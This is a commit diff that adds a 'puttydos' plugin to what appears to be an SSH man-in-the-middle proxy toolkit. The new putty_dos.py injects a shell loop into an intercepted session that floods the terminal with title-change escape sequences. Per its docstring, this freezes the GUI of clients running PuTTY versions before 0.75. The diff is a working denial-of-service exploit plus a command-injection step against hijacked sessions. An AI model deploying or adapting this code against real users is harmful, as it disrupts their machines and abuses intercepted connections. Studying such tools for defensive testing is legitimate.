Added DoS attack

Author: JakobJBauer

ssh_mitm_plugins/__entrypoints__.py

@@ -2,7 +2,8 @@
     'SSHBaseForwarder': [
         'scriptedshell = ssh_mitm_plugins.ssh.scriptedshell:SSHScriptedForwarder',
         'stealthshell = ssh_mitm_plugins.ssh.stealthshell:SSHStealthForwarder',
-        'injectorshell = ssh_mitm_plugins.ssh.injectorshell:SSHInjectableForwarder'
+        'injectorshell = ssh_mitm_plugins.ssh.injectorshell:SSHInjectableForwarder',
+        'puttydos = ssh_mitm_plugins.ssh.putty_dos:SSHPuttyDoSForwarder'
     ],
     'SCPBaseForwarder': [
 

ssh_mitm_plugins/ssh/putty_dos.py

@@ -0,0 +1,28 @@
+from ssh_proxy_server.forwarders.ssh import SSHForwarder
+
+
+class SSHPuttyDoSForwarder(SSHForwarder):
+    """PuTTY < 0.75: DoS on Windows/Linux clients
+
+    Security fix: a server could DoS the whole Windows/Linux GUI by telling
+    the PuTTY window to change its title repeatedly at high speed.
+
+    PuTTY-Changelog: https://www.chiark.greenend.org.uk/~sgtatham/putty/changes.html
+    """
+
+    def __init__(self, session):
+        super().__init__(session)
+        self.exploit = [
+            "PS1=''",
+            "while :",
+            "do",
+            "echo -ne '\\033]0: NEW_TITLE${RANDOM} \\007'",
+            "done"
+        ]
+        self.executed = False
+
+    def stdin(self, text):
+        if not self.executed:
+            self.executed = True
+            return '\n'.join(self.exploit)
+        return text